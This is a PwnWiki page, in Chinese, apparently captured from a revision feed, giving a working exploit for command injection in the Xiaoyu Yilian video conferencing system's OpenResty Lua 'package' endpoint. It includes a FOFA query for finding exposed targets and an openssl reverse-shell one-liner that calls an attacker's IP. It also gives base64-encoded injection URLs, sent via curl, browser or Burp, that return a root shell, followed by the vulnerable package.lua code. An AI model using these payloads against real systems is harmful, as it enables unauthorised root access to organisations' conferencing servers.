https://pwnwiki.com/index.php?action=history&feed=atom&title=%E5%B0%8F%E9%AD%9A%E6%98%93%E9%80%A3%E8%A6%96%E9%A0%BB%E7%B3%BB%E7%B5%B1-Nginx_LUA%E8%85%B3%E6%9C%AC%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-cn
小魚易連視頻系統-Nginx LUA腳本遠程命令執行漏洞/zh-cn - Revision history
2026-04-24T11:19:35Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=%E5%B0%8F%E9%AD%9A%E6%98%93%E9%80%A3%E8%A6%96%E9%A0%BB%E7%B3%BB%E7%B5%B1-Nginx_LUA%E8%85%B3%E6%9C%AC%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn&diff=4225&oldid=prev
Pwnwiki: Created page with "构造“package?path=”路径下命令执行语句,将上面反弹shell命令进行base64加密。"
2021-06-07T01:24:08Z
<p>Created page with "构造“package?path=”路径下命令执行语句,将上面反弹shell命令进行base64加密。"</p>
<p><b>New page</b></p><div><languages /><br />
<br />
==FOFA==<br />
<pre><br />
title="云视讯管理平台"<br />
</pre><br />
<br />
==漏洞利用==<br />
找到页面了之后寻找该该系统的OpenReaty页面,一般都在其他端口上。<br />
<br />
然后本地进行openssl监听:<br />
<pre><br />
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes<br />
<br />
openssl s_server -quiet -key key.pem -cert cert.pem -port 443<br />
<br />
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <IP>:<PORT> > /tmp/s; rm /tmp/s<br />
</pre><br />
构造“package?path=”路径下命令执行语句,将上面反弹shell命令进行base64加密。<br />
<br />
1、请求目机机器上执行命令有三种方法:<br />
<pre><br />
curl:curl "http://ip/package?path=`echo bWtmaWZvIC90bXAvczsvYmluL2Jhc2ggLWkgPCAvdG1wL3MgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMC42Mi45Ni4yMzY6ODg4ID4gL3RtcC9zO3JtIC1mIC90bXAvcw== | base64 -d | sh`"<br />
</pre><br />
<br />
2、直接web上面请求:<br />
<pre><br />
http://ip/package?path=echo bWtmaWZvIC90bXAvczsvYmluL2Jhc2ggLWkgPCAvdG1wL3MgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMC42Mi45Ni4yMzY6ODg4ID4gL3RtcC9zO3JtIC1mIC90bXAvcw== | base64 -d | sh<br />
</pre><br />
3、burpsuite抓包拦截请求,同web一样。<br />
<br />
burpsuite抓上面的请求会返回302,然后跳转404。监听服务器返回ROOT权限shell。<br />
<br />
==详细分析==<br />
<pre><br />
netstat -anvp | grep :80<br />
</pre><br />
返回结果如下:<br />
<pre><br />
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 16554/nginx: mas<br />
</pre><br />
<br />
运行在 80 端口的程序为 nginx,在宿主机中寻找 nginx 程序:<br />
<pre><br />
find / -name nginx<br />
</pre><br />
发现宿主机中没有运行 nginx<br />
<br />
于是尝试进入 k8s 中的容器寻找响应服务:<br />
<pre><br />
docker ps | grep openresty<br />
</pre><br />
<br />
返回如下:<br />
<pre><br />
b61e91356e49 "/usr/local/openresty" <br />
</pre><br />
<br />
最终在 k8s 中的 openresty 容器中发现了 nginx 程序/usr/local/openresty/nginx,查询 nginx 配置文件,发现配置文件当中引用了一行 lua 脚本:<br />
<pre><br />
location = /package {<br />
proxy_set_header Host $host:$server_port;<br />
proxy_set_header X-Real-IP $remote_addr;<br />
proxy_set_header X-Nginx-IP $server_addr;<br />
limit_req zone=normalfrequ burst=20 nodelay;<br />
content_by_lua_file lua/package.lua;<br />
}<br />
</pre><br />
查询该文件并查看文件内容 <code>cat /usr/local/openresty/nginx/lua/package.lua</code><br />
<pre><br />
local package_absolute_path = '/var/log/logs.tar.gz'<br />
local path = ngx.req.get_uri_args().path<br />
if nil == path then<br />
path = '/logs'<br />
end<br />
os.execute('rm -rf ' .. package_absolute_path)<br />
os.execute('tar -zcvPf ' .. package_absolute_path .. ' ' .. path)<br />
ngx.redirect('/log/logs.tar.gz?' .. os.time())<br />
print('rm -rf ' .. package_absolute_path)<br />
os.execute('rm -rf ' .. package_absolute_path)<br />
return<br />
</pre><br />
在配置文件中直接对path参数传入的字符串与rm -rf等命令进行拼接,没有进行文件白名单等过滤,攻击者可以通过构造特殊字符串对命令进行闭合,从而造成Linux命令注入。<br />
<br />
==参考==<br />
<br />
https://short.pwnwiki.org/?c=bPShOE</div>
Pwnwiki